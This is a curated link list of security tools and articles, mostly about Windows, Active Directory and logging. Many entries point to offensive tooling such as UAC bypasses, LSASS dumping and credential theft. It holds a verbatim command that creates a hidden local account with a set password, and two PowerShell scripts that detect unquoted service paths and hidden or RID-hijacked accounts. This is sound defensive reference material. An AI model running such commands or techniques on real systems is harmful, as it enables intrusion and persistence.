Logsspot | : Logsspot is a project created to help cybersec folks understand what kind of information a security technology can present and how to use to improve detection and intelligence | ||
Corsair | 7 | over 5 years ago | : Python wrapper for some NSOC tools. Corsair aims to implement RESTFul wrappers for different tools commonly used by Network and Security Operations Centers (NSOC) |
Scalable Logging and Tracking | |||
Logs were our lifeblood. Now they're our liability. | |||
Using Flume to Collect Apache 2 Web Server Logs | |||
spectx | : Instantly parse and investigate raw log files | ||
The log/event processing pipeline you can't have | |||
Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance | |||
Here's a Splunk way to score behaviors that are derived from detections | |||
ProductLoggingTracker | 7 | almost 5 years ago | : Simple list of product types that InfoSec professionals may want to collect into a central repository |
The Log Pile | : scripts to help decide which logs to save | ||
Part of my role is ensuring we're not EDR-centric. We have to be able to detect threats w/o OS-level viz (e.g., control plane only), using auth/net events, or whatever data is in a SIEM | |||
LORG | 209 | almost 6 years ago | : Apache Logfile Security Analyzer |
Shipping to Elasticsearch Microsoft DNS Logs | |||
Windows 10 ETW Events | 267 | 7 months ago | : Events from all manifest-based and mof-based ETW providers across Windows 10 versions |
Log Parser Lizard | : provides a modern graphical user interface to Microsoft Log Parser 2.2 for analyzing logs using SQL queries | ||
Fluentd | 12,912 | 11 days ago | : Unified Logging Layer (project under CNCF) |
Laurel | 711 | 23 days ago | : Transform Linux Audit logs for SIEM usage |
Matano | 1,474 | 4 months ago | : The open-source |
CSIRT / Browsers | |||
SOK: On the Analysis of Web Browser Security | |||
Bypassing Browser Security Warnings with Pseudo Password Fields | |||
New Cache ATtacks on TLS Implementations | The 9 Lives of Bleichenbacher's CAT: | ||
How To Blow Your Online Cover With URL Previews | |||
Nefarious LinkedIn | : A look at how LinkedIn exfiltrates extension data from your browser | ||
Lightnion | 119 | about 4 years ago | : A light version of Tor portable to the browser |
Puppeteer | 88,848 | 8 days ago | : Headless Chrome Node API |
uBlock Origin | 47,504 | 6 days ago | : An efficient blocker for Chromium and Firefox. Fast and lean |
autochrome | 446 | 8 months ago | : This tool downloads, installs, and configures a shiny new copy of Chromium |
BROWSERGAP | : Browse Anything Securely, Browse the web without the web browsing you | ||
browsergap.ce | 3,454 | 13 days ago | : Simple Isolated Remote Browsers, Open Source |
Crash Chrome | |||
Firefox: How a website could steal all your cookies | |||
Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique | |||
CSIRT / Browsers / Browsers Addons | |||
Addons for Firefox | : | ||
LinkGopher | |||
WebDeveloper | |||
IPvFoo | |||
DownthemAll | |||
SixorNot | |||
Uppity | |||
Cliget | |||
URLs List | |||
Link Redirect Trace | |||
Tamper Data for FF Quantum | |||
BuiltWith | |||
Wappalyzer | |||
Exif Viewer | |||
Anti-Grabify Browser Extension | 64 | 8 months ago | |
CSIRT / Operating Systems | |||
bochspwn-reloaded | 297 | over 5 years ago | : A Bochs-based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3 |
drltrace | 389 | over 4 years ago | : Drltrace is a library calls tracer for Windows and Linux applications |
shellz | 569 | 4 months ago | : is a small utility to track and control your ssh, telnet, web and custom shells |
CLIP OS | : Open Source secured operating system by Agence nationale de la sécurité des systèmes d'information | ||
How to Get Started With VMware vSphere Security « vMiss.net | |||
routeros | 866 | almost 2 years ago | : RouterOS Bug Hunt Materials Presented at Derbycon 2018 |
Awesome-Study-Resources-for-Kernel-Hacking | 106 | over 8 years ago | : Kernel Hacking study materials collection |
Skadi | 491 | about 2 years ago | : Collect, Process, and Hunt with host based data from MacOS, Windows, and Linux |
taintgrind | 249 | about 1 year ago | : A taint-tracking plugin for the Valgrind memory checking tool |
UPX | is a free, portable, extendable, high-performance executable packer for several executable formats | ||
CSIRT / Operating Systems / Mainframe: | |||
MF Sniffer | 47 | over 1 year ago | : Mainframe TN3270 unencrypted TSO session user ID and password sniffer |
CSIRT / Operating Systems | |||
magic-trace | 4,658 | about 1 month ago | : collects and displays high-resolution traces of what a process is doing |
CSIRT / Operating Systems / UEFI | |||
uefi-jitfuck | 85 | over 6 years ago | : A JIT compiler for Brainfuck running on x86_64 UEFI |
Secure Boot in the Era of the T2 | : Continuing our series on Apple’s new T2 platform and examining the role it plays in Apple’s vision of Secure Boot | ||
PSPTool | 611 | 2 months ago | : Display, extract, and manipulate PSP firmware inside UEFI images |
Project Mu | : is a modular adaptation of TianoCore's edk2 tuned for building modern devices using a scalable, maintainable, and reusable pattern | ||
Force firmware code to be measured and attested by Secure Launch on Windows 10 | |||
CSIRT / Operating Systems / Windows | |||
Awesome Advanced Windows Exploitation References | 1,457 | almost 3 years ago | |
windows kernel security development | 1,957 | about 2 years ago | |
A process scanner detecting and dumping hollowed PE modules. | 2,036 | 17 days ago | |
dll_to_exe | 794 | over 1 year ago | : Converts a DLL into EXE |
pe-sieve | 3,103 | 17 days ago | : Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches) |
A PowerShell utility to dynamically uncover a DCShadow attack | |||
MSRC | 1,324 | 4 months ago | : Security research from the Microsoft Security Response Center |
DCSYNCMonitor | 138 | over 6 years ago | |
Total Meltdown? | |||
DetectionLab | 4,649 | 5 months ago | : Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. Post |
powerlessshell | 1,474 | over 1 year ago | : Run PowerShell command without invoking powershell.exe |
internal-monologue | 1,401 | about 6 years ago | : Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS |
Robber | 765 | over 2 years ago | is open source tool for finding executables prone to DLL hijacking |
Remote-Desktop-Caching | 208 | over 6 years ago | |
LogRM | 73 | over 5 years ago | : LogRM is a post-exploitation PowerShell script that uses Windows event logs to gather information |
InvisiblePersistence | 338 | over 6 years ago | : Persisting in the Windows registry "invisibly" |
Dynamic Tracing in Windows 10 19H1 | |||
Capturing NetNTLM Hashes with Office [DOT] XML Documents | |||
LoL Malware Meets Python-Based Command and Control (C2) Server, Part I | |||
Passing-the-Hash to NTLM Authenticated Web Applications | |||
Detours | 5,270 | about 1 month ago | : Detours is a software package for monitoring and instrumenting API calls on Windows. It is distributed in source code form |
r0ak | 28 | about 6 years ago | : r0ak ("roak") is the Ring 0 Army Knife, a command-line utility to read/write/execute ring zero on Windows 10 systems |
SpeculationControl | 130 | over 1 year ago | : SpeculationControl is a PowerShell script that summarizes the state of configurable Windows mitigations for various speculative execution side channel vulnerabilities, such as CVE-2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown) |
Reverse Engineering Windows Defender (by Alexei Bulazel) |||
CSIRT / Operating Systems / Windows / pdf | |||
XOR encryption – Windows x64 | Ground Zero: Part 2-2 | ||
Building Cracked Binaries – Windows x64 | Ground Zero: Part 2-3 | ||
CSIRT / Operating Systems / Windows | |||
EKFiddle | 636 | 5 days ago | : A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general |
Windows Command-Line | : Introducing the Windows Pseudo Console (ConPTY) – Windows Command Line Tools For Developers | ||
MSconsole | 95,774 | 6 days ago | : Windows Console Tools |
PowerShell Remoting | by Stephanos Constantinou Blog | ||
DbgShell | 675 | 8 months ago | : A PowerShell front-end for the Windows debugger engine |
Windows Incident Response: Updates | |||
Win 10 related research | 178 | 11 months ago | |
CSIRT / Operating Systems / Windows / Win 10 related research | |||
Event log 'Keywords' p1 | 178 | 11 months ago | |
Windows 10 - Notifications | 178 | 11 months ago | |
CSIRT / Operating Systems / Windows | |||
UAC bypass using CreateNewLink COM interface | |||
CSIRT / Operating Systems / Windows / Privilege Escalation: | |||
Windows Privilege Escalation (Unquoted Path Service) | |||
WinPwnage | 2,622 | almost 2 years ago | : Elevate, UAC bypass, privilege escalation, dll hijack techniques |
Securing SCOM in a Privilege Tiered Access Model | Part 1 ||
Windows Privilege Escalation Guide | : This guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect | ||
An introduction to privileged file operation abuse on Windows | : This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs | ||
Control Flow Guard Teleportation | : The idea that I tried in 2018 was to use Control Flow Guard (CFG) to regenerate my code in a special memory region. CFG is a security feature that aims to mitigate the redirection of the execution flow, for example, by checking whether the target address of an indirect call is a valid function | ||
The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use. |||
An unprivileged window could just send commands to a highly privileged window, and that's what UIPI, User Interface Privilege Isolation, prevents. This isn't a story about UIPI, but it is how it began. |||
Interactive CTF Exploration Tool |||
PsExec Local Privilege Escalation | |||
SweetPotato | 1,622 | 3 months ago | : Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019 |
Windows Exploit Suggester - Next Generation (WES-NG) | 4,226 | 11 days ago | |
Windows Local Privilege Escalation Cookbook | 981 | 8 months ago | |
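The unquoted service path entry above is the classic case of "enumeration first": what matters is not the missing quotes alone but which of the intermediate paths Windows tries before the real binary sit in a directory a low-privileged user can write to. The following PowerShell is an added example, not code from any of the linked guides or tools; the list of "weak" principals it checks the directory ACLs against is an assumption to adjust per environment.

```powershell
# Added example: list services whose ImagePath is unquoted and contains spaces,
# enumerate the paths CreateProcess would try before the intended binary, and
# flag those whose parent directory is writable by low-privileged principals.
# Read-only; runs as a normal user.

$weakPrincipals = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                  'NT AUTHORITY\INTERACTIVE', "$env:USERDOMAIN\$env:USERNAME"   # assumption
$writeMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::Modify -bor
                   [System.Security.AccessControl.FileSystemRights]::FullControl)

function Test-WeakWriteAccess {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $acl = Get-Acl -LiteralPath $Directory
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($weakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
      Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -match ' ' } |
      ForEach-Object {
        $path = $_.PathName
        # Drop arguments: keep everything up to and including the first ".exe"
        $idx = $path.ToLower().IndexOf('.exe')
        $exe = if ($idx -ge 0) { $path.Substring(0, $idx + 4) } else { $path }

        # CreateProcess tries each space-delimited prefix as the program name
        # (appending ".exe"): C:\Program.exe, then C:\Program Files\Foo.exe, ...
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = $parts[0..($i - 1)] -join ' '
            $dir = Split-Path -Path $candidate -Parent
            if (-not $dir) { continue }
            [pscustomobject]@{
                Service     = $_.Name
                StartName   = $_.StartName
                PathName    = $path
                Candidate   = "$candidate.exe"
                WritableDir = Test-WeakWriteAccess -Directory $dir
            }
        }
      }
}

# Only the rows with a writable directory are exploitable; StartName tells you
# which account (typically LocalSystem) the planted binary would run as.
Get-UnquotedServicePath | Where-Object WritableDir | Format-Table -AutoSize
```

A service that is unquoted but whose every intermediate directory is only writable by administrators is a finding for the report, not a privilege escalation; the ACL check is what separates the two.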
CSIRT / Operating Systems / Windows | |||
Remote NTLM relaying through meterpreter on Windows port 445 | and a TCP packet diverter for the Windows platform ||
Analyzing obfuscated powershell with shellcode |||
Empire 4.2 was just finalized over the weekend and we are excited to share some of the new features. | |||
relayer | 148 | almost 6 years ago | : SMB Relay Attack Script |
Ps1jacker | 61 | about 6 years ago | : Ps1jacker is a tool for generating COM Hijacking payload |
python-dotnet-binaryformat | 49 | about 6 years ago | : Pure Python parser for data encoded by .NET's BinaryFormatter |
Firework | 44 | over 4 years ago | : Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process |
UACME | 6,377 | 4 months ago | : Defeating Windows User Account Control |
SysmonTools | 1,488 | 6 months ago | : Utilities for Sysmon |
sysmon-config | 4,810 | 5 months ago | : Sysmon configuration file template with default high-quality event tracing |
Sysmon: how to set up, update and use? | |||
Panache_Sysmon | : Just another sysmon config | ||
Hiding malware in Windows | – The basics of code injection | ||
Inveigh | 2,555 | 4 months ago | : Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool |
Bypassing AppLocker Custom Rules | : 0x09AL Security blog | ||
SpecuCheck | 569 | about 5 years ago | : SpecuCheck is a Windows utility for checking the state of the software mitigations against CVE-2017-5754 (Meltdown) and hardware mitigations against CVE-2017-5715 (Spectre) |
RID-Hijacking | 165 | about 2 years ago | : Windows RID Hijacking persistence technique |
WSL Reloaded | |||
Windows oneliners to download remote payload and execute arbitrary code | |||
reflectivepotato | : MSFRottenPotato built as a Reflective DLL. Work in progress | ||
randomrepo | 0 | 10 months ago | : Repo for random stuff |
Microsoft Windows win32k.sys | : Invalid Pointer Vulnerability (MSRC Case 48212) - Security Research | ||
rdpy | 1,690 | over 3 years ago | : Remote Desktop Protocol in Twisted Python |
SharpWeb | 510 | almost 6 years ago | : .NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge |
reconerator | 121 | almost 4 years ago | : C# targeted attack reconnaissance tools |
ManagedInjection | 162 | over 6 years ago | : A proof of concept for dynamically loading .NET assemblies at runtime with only minimal convention pre-knowledge |
InveighZero | 791 | about 2 years ago | : C# LLMNR/NBNS spoofer |
DanderSpritz Lab | 419 | over 5 years ago | : A fully functional lab in 2 commands |
Lateral movement using URL Protocol | |||
HiddenPowerShell | 93 | about 6 years ago | : This project was created to explore the various evasion techniques involving PowerShell: Amsi, ScriptBlockLogging, Constrained Language Mode and AppLocker |
One Windows Kernel | |||
The Dog Whisperer’s Handbook | : This PDF is a collection of bits and pieces that were scattered across the web and that I collected in the last two years while writing the CypherDog PowerShell module | ||
Attack and Defend microsoft enhanced security administrative environment | |||
raw-socket-sniffer | 180 | about 6 years ago | : Packet capture on Windows without a kernel driver |
DCOMrade | 254 | almost 6 years ago | : Powershell script for enumerating vulnerable DCOM Applications |
shed | 268 | almost 6 years ago | : .NET runtime inspector |
Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host | |||
How to steal NTLMv2 hashes using file download vulnerability in web application | |||
NTLMRelay2Self | 394 | 10 months ago | : Another no-fix LPE, NTLMRelay2Self over HTTP (WebDAV) |
Simpleator | 335 | almost 6 years ago | : ("Simple-ator") is an innovative Windows-centric x64 user-mode application emulator that lever |
WinDbg-Samples | 722 | 3 months ago | : Sample extensions, scripts, and API uses for WinDbg |
OrgKit | 597 | 3 months ago | : Provision a brand-new company with proper defaults in Windows, Office 365, and Azure |
Leveraging WSUS | |||
windowsblindread | 199 | over 1 year ago | : A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system |
azucar | 563 | about 2 years ago | : Security auditing tool for Azure environments |
volatility-wnf | 15 | almost 6 years ago | : Browse and dump Windows Notification Facilities |
Yet another sdclt UAC bypass | : As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window | ||
awesome-windows-kernel-security-development | 1,957 | about 2 years ago | : windows kernel security development |
ALPC-BypassUAC | 155 | over 5 years ago | : UAC Bypass with mmc via alpc |
ManagedPasswordFilter | 45 | over 5 years ago | : Windows Password Filter that uses managed code internally |
DeviceGuardBypasses | 133 | over 7 years ago | : A repository of some of my Windows 10 Device Guard Bypasses |
rifiuti2 | 144 | 7 months ago | : Windows Recycle Bin analyser |
Reversing and Patching .NET Binaries with Embedded References | |||
Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript | |||
Windows PowerShell Remoting | : Host Based Investigation and Containment Techniques | ||
.NET Manifesto | : Win friends and influence the loader ||
Bypassing Windows User Account Control | |||
symboliclink-testing-tools | 758 | almost 2 years ago | : This is a small suite of tools to test various symbolic link types of Windows |
Run PowerShell without Powershell.exe | — Best tools & techniques | ||
Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor | |||
Privileged Access Workstations | |||
Activation Contexts | — A Love Story. Windows loads a version of the Microsoft.Windows.SystemCompatible assembly manifest into every process. Tampering with it lets you inject DLL side-loading opportunities into every process, and to perform COM hijacking without touching the registry. Unfortunately, the manifest could be replaced by another version, possibly killing your persistence by surprise | ||
Evil-WinRM | 4,537 | 25 days ago | : The ultimate WinRM shell for hacking/pentesting |
Understanding WdBoot (Windows Defender ELAM) | |||
SharpHide | 465 | about 5 years ago | : Tool to create hidden registry keys |
Microsoft Finally Releases Guidance and a Script to Change the KRBTGT Account | |||
Deploying honeytokens in Active Directory & How to trick attackers with deceptive BloodHound paths | |||
CrackMapExec | module that marks every target owned by the attacker as "owned" in BloodHound ||
Configuring Additional LSA Protection | |||
Getting Malicious Office Documents to Fire with Protected View Enabled |||
CSIRT / Operating Systems / Windows / The Internals of AppLocker: | |||
Overview and Setup | Part 1: | ||
Blocking Process Creation | Part 2: | ||
Access Tokens and Access Checking | Part 3: | ||
Blocking DLL Loading | Part 4: | ||
CSIRT / Operating Systems / Windows | |||
COM-Code-Helper | 178 | about 4 years ago | : Two IDAPython Scripts help you to reconstruct Microsoft COM (Component Object Model) Code |
Scylla | 1,116 | over 1 year ago | : Imports Reconstructor |
A Speed-Research on Windows Explorer's Auto-Completion | |||
sysmon-config | 4,810 | 5 months ago | : A Sysmon configuration file for everybody to fork |
Windows Event Forwarding Guidance | 1,228 | 4 months ago | |
Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI | |||
Microsoft Defender Advanced Threat Protection (ATP) | |||
BeaKer | 286 | about 2 months ago | : Beaconing Kibana Executable Report: aggregates Sysmon network events with Elasticsearch and Kibana |
python-ntlm | 90 | over 2 years ago | : Automatically exported from code.google.com/p/python-ntlm |
Logging Made Easy | 706 | about 1 year ago | : is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks |
SharePoint and Pwn | : Remote Code Execution Against SharePoint Server Abusing DataSet ||
Secure DevOps Kit for Azure | 497 | almost 3 years ago | (AzSK) |
Windows Debugger API — The End of Versioned Structures | |||
DisableAntiSpyware | |||
Have you ever wondered what happens behind the scenes when you type your password into the Windows logon screen and hit enter? | |||
DefendTheFlag | 234 | over 4 years ago | : Get started fast with a built out lab, built from scratch via Azure Resource Manager (ARM) and Desired State Configuration (DSC), to test out Microsoft's security products |
DumpReparsePoints | 31 | over 4 years ago | : This is a simple tool to dump all the reparse points on an NTFS volume |
Certify SSL Manager | : manage free https certificates for IIS | ||
Bypassing Credential Guard | : Wdigest can be enabled on a system with Credential Guard by patching the values of g_fParameter_useLogonCredential and g_IsCredGuardEnabled in memory | ||
WSUS Attacks Part 1: Introducing PyWSUS | |||
This is about adding a "$" account and having it not show up in net user output. | : net user $ LetMeIn123! /add /active:yes ||
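The trick above works because net user filters out names ending in "$" client-side; the account is fully present in the SAM. The same SAM hive is what the RID Hijacking entry earlier in this section manipulates. The PowerShell below is an added example, not code from either linked resource: it enumerates local accounts through WMI, which does not apply the "$" filter, and, when run as SYSTEM (for example under psexec -s, which is required to read HKLM\SAM), compares each SAM user key name with the RID stored at offset 0x30 of its F value, the field RID hijacking overwrites.

```powershell
# Added example: find local accounts that "net user" hides (names ending in "$").
function Get-DollarAccount {
    Get-CimInstance -ClassName Win32_UserAccount -Filter "LocalAccount = TRUE" |
      Where-Object { $_.Name.EndsWith('$') } |
      Select-Object Name, SID, Disabled,
                    @{ n = 'RID'; e = { [int]($_.SID -split '-')[-1] } }
}

# RID hijacking rewrites the 4-byte RID at offset 0x30 of the user's F value under
# HKLM\SAM\SAM\Domains\Account\Users so the account is treated as RID 500. The
# subkey name is the real RID in hex, so the two must agree on a clean system.
# Reading HKLM\SAM needs SYSTEM; as a plain administrator this returns nothing.
function Get-RidMismatch {
    $base = 'HKLM:\SAM\SAM\Domains\Account\Users'
    Get-ChildItem -Path $base -ErrorAction SilentlyContinue |
      Where-Object { $_.PSChildName -ne 'Names' } |
      ForEach-Object {
        $keyRid = [Convert]::ToUInt32($_.PSChildName, 16)
        $f = (Get-ItemProperty -Path $_.PSPath -Name F).F
        if ($f.Length -lt 0x34) { return }
        $fRid = [BitConverter]::ToUInt32($f, 0x30)
        if ($keyRid -ne $fRid) {
            [pscustomobject]@{ Key = $_.PSChildName; KeyRid = $keyRid; FValueRid = $fRid }
        }
      }
}

Get-DollarAccount | Format-Table -AutoSize
Get-RidMismatch   | Format-Table -AutoSize
```

Any row from Get-RidMismatch means the account with that key will be authenticated as the RID in its F value (500 = built-in Administrator) while still appearing under its own name; Get-DollarAccount is the cheap check to run first because it needs no elevation.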
LECmd | 277 | 5 months ago | : Lnk Explorer Command line edition!! |
PECmd | 223 | 2 months ago | : Prefetch Explorer Command Line |
Five PE Analysis Tools Worth Looking At | |||
CSIRT / Operating Systems / Windows / Five PE Analysis Tools Worth Looking At | |||
pestudio | : The goal of pestudio is to spot suspicious artifacts within executable files in order to ease and accelerate Malware Initial Assessment and is used by Computer Emergency Response Teams and Labs worldwide | ||
PEview version | |||
FileAlyzer | |||
NTCore | Explorer Suite | ||
exeinfo | |||
CSIRT / Operating Systems / Windows | |||
MitigationFlagsCliTool | 44 | about 4 years ago | : Prints mitigation policy information for processes in a dump file |
Windows 10 System Programming book samples | 408 | 6 months ago | |
DriverMon | 328 | about 4 years ago | : Monitor activity of any driver |
Windows AllTools | 1,161 | 3 months ago | : All reasonably stable tools |
Sysmon Internals | : From File Delete Event to Kernel Code Execution | ||
Windows-driver-samples | 6,993 | 18 days ago | : This repo contains driver samples prepared for use with Microsoft Visual Studio and the Windows Driver Kit (WDK). It contains both Universal Windows Driver and desktop-only driver samples |
procfilter | 397 | almost 5 years ago | : A YARA-integrated process denial framework for Windows |
Winerror | 7 | about 4 years ago | : Get descriptions of Windows programming error codes from the command line |
ProcessHacker | 11,043 | 7 days ago | : A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware |
PVE CA Cert List Utility | : Windows 2003/2008 Certificate Authority Certificate List Utility for pending requests and about-to-expire certificates | ||
Release the Kraken: Fileless injection into Windows Error Reporting service | |||
MinHook | 4,406 | 4 months ago | : The Minimalistic x86/x64 API Hooking Library for Windows |
Windows security baselines | |||
TokenPlayer | 267 | almost 4 years ago | : Manipulating and Abusing Windows Access Tokens |
The Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment | |||
ntlmscan | 346 | 5 months ago | : scan for NTLM directories |
Smbtouch-Scanner | 140 | over 3 years ago | : Automatically scan the internal network to detect vulnerable hosts |
Block process creations originating from PSExec and WMI commands | |||
VDM | : Vulnerable Driver Manipulation, with a collection of various vulnerable (mostly physical-memory-exposing) drivers ||
HppDLL | 1 | about 4 years ago | : Source code for local password dumping using MsvpPasswordValidate hooks |
SharpMapExec | 653 | about 3 years ago | : A sharpen version of CrackMapExec. This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements |
Fibratus | 2,209 | 8 days ago | : A modern tool for the Windows kernel exploration and observability |
Ultimate WDAC Bypass List | 482 | 7 months ago | : A centralized resource for previously documented WDAC bypass techniques |
Live Patching Windows API Calls Using PowerShell | |||
Adventures in Dynamic Evasion | |||
Windows-Insight | 150 | over 4 years ago | : The content of this repository aims to assist efforts on analysing inner working principles, functionalities, and properties of the Microsoft Windows operating system. This repository stores relevant documentation as well as executable files needed for conducting analysis studies |
Fully working SMB protocol implementation in webassembly | |||
Parent Process vs. Creator Process | |||
WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) | IS USED BY BITTER APT IN TARGETED ATTACK | ||
ntvdmx64 | 819 | 18 days ago | : Run Microsoft Windows NTVDM (DOS) on 64bit Editions |
Spectre exploits in the "wild" | |||
RegRipper | 557 | 20 days ago | |
Security rapid modernization plan | |||
Windows & Active Directory Exploitation Cheat Sheet and Command Reference | |||
Finding writable folders and hijackable DLLs | |||
OffensiveCSharp | 1,381 | almost 2 years ago | : Collection of Offensive C# Tooling |
Hyper-V internals researches | 661 | 2 months ago | : Internals information about Hyper-V |
Do You Really Know About LSA Protection (RunAsPPL)? | and a tool to dump the memory of a PPL with a userland exploit ||
MSTSC Packet Dump Utility | 27 | almost 3 years ago | : The mstscdump utility allows unencrypted RDP packets being sent or received by MSTSC.EXE (or any other application that loads MSTSCAX.DLL) to be captured into a PCAP file for later analysis in various tools such as Microsoft Message Analyzer, Microsoft Network Monitor, or WireShark. It also demonstrates how to hook into the ActiveX interfaces exposed by MSTSCAX.DLL |
How to bypass Defender in a few easy steps | |||
Running NetworkMiner in Windows Sandbox | |||
Windows Desktop | 14 | almost 4 years ago | : History and analysis of Windows desktop images |
A collection of tools to interact with Microsoft Security Response Center API | 95 | 11 months ago | |
GetTempPathW function | |||
No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders | |||
Human-operated ransomware | : Human-operated ransomware is a large and growing attack trend that represents a threat to organizations in every industry | ||
Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft | |||
Microsoft Security Best Practices | |||
Awesome Windows Domain Hardening | 1,749 | almost 5 years ago | : A curated list of awesome Security Hardening techniques for Windows |
Event Log Explorer™ for Windows event log analysis | |||
Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory | |||
EVERYONE GETS A ROOTKIT | : Eclypsium Researchers Identify Weakness in Microsoft WPBT Impacting All Windows-based Devices Since Windows 8 | ||
Six Facts about Address Space Layout Randomization on Windows | |||
whids | 1,151 | over 1 year ago | : Open Source EDR for Windows |
Backdoor .NET assemblies with… dnSpy | |||
Windows-auditing-mindmap | 1,044 | 3 months ago | : Set of Mindmaps providing a detailed overview of the different #Windows auditing capacities and event log files |
If you ever see RDP events, you should parse out the RDP bitmap cache. It maps out bitmap images of a user's RDP session. | |||
Here are a few tool resources for using WinRM w/o PowerShell | |||
CSIRT / Operating Systems / Windows / Here are a few tool resources for using WinRM w/o PowerShell | |||
winrs | |||
Scripting in Windows Remote Management | |||
CSharpWinRM | 161 | about 4 years ago | : .NET 4.0 WinRM API command execution |
WinRMDLL | 140 | about 3 years ago | : C++ WinRM API via Reflective DLL |
WSMan-WinRM | 222 | over 4 years ago | : A collection of proof-of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM object |
pywinrm | : is a Python client for the Windows Remote Management (WinRM) service. It allows you to invoke commands on target Windows machines from any machine that can run Python | ||
Abusing Windows Remote Management (WinRM) with Metasploit | |||
CSIRT / Operating Systems / Windows | |||
LACheck | 83 | about 3 years ago | : Multithreaded C# .NET Assembly Local Administrative Privilege Enumeration |
awesome_windows_logical_bugs | 567 | 5 months ago | : A collection of Windows logical bug cases for learning |
Attacking RDP from Inside | : How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more | ||
Dynamic Invocation in .NET to bypass hooks | |||
LowBox Token Permissive Learning Mode | |||
DInjector | : Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL | ||
SMB-Session-Spoofing | 118 | about 1 year ago | : The goal of this program is to create a fake SMB Session |
Windows Kernel Introspection (WKI) | |||
MSSQL Analysis Services - Coerced Authentication | 124 | about 1 year ago | : A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine |
Reinschauer | 506 | almost 2 years ago | : A PoC to remotely control Windows machines over Websockets |
Lsass Shtinkering | 377 | almost 2 years ago | : New method of dumping LSASS by abusing the Windows Error Reporting service. It sends a message to the service with the ALPC protocol to report an exception on LSASS. This report will cause the service to dump the memory of LSASS |
Windows Persistence Techniques | |||
Windows XP / Windows Server 2003 VLK key generator | 878 | 12 months ago | |
Banshee | 493 | 8 months ago | : Experimental Windows x64 Kernel Driver/Rootkit |
New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections | |||
Active Directory Control Paths | 654 | almost 4 years ago | |
Gaining Domain Admin from Outside Active Directory | using an LLMNR/NBT-NS/mDNS poisoner and NTLMv1/2 relay ||
Invoke-ADLabDeployer | 479 | almost 6 years ago | : Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams |
PowerShellClassLab | 41 | over 6 years ago | : This is a set of Azure Resource Manager Templates that generates an Active Directory lab consisting of a Domain Controller, two Windows servers and a Linux server |
ADImporter | 69 | over 6 years ago | |
Low Privilege Active Directory Enumeration from a non-Domain Joined Host | |||
Active Directory as a C2 | |||
Escalating privileges with ACLs in Active Directory | |||
Active Directory Kill Chain Attack & Defense | 4,421 | 16 days ago | : This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity |
#TR19 Active Directory Security Track | |||
Penetration Testing Active Directory, Part I | : I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’re ready for a pentest, which then leads me to getting domain administrator in fifteen minutes by just exploiting misconfigurations in AD | ||
Penetration Testing Active Directory, Part II | : For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation | ||
Wagging the Dog | : Abusing Resource-Based Constrained Delegation to Attack Active Directory | ||
Exploiting PrivExchange | : The PrivExchange tool simply logs in on Exchange Web Services to subscribe to push notifications to a specific host | ||
CSIRT / Operating Systems / Windows / BloodHound: | |||
BloodHound | 9,893 | 5 months ago | : Six Degrees of Domain Admin, with an ingestor for BloodHound |
BloodHound Database Creator | 377 | 5 months ago | : This python script will generate a randomized data set for testing BloodHound features and analysis |
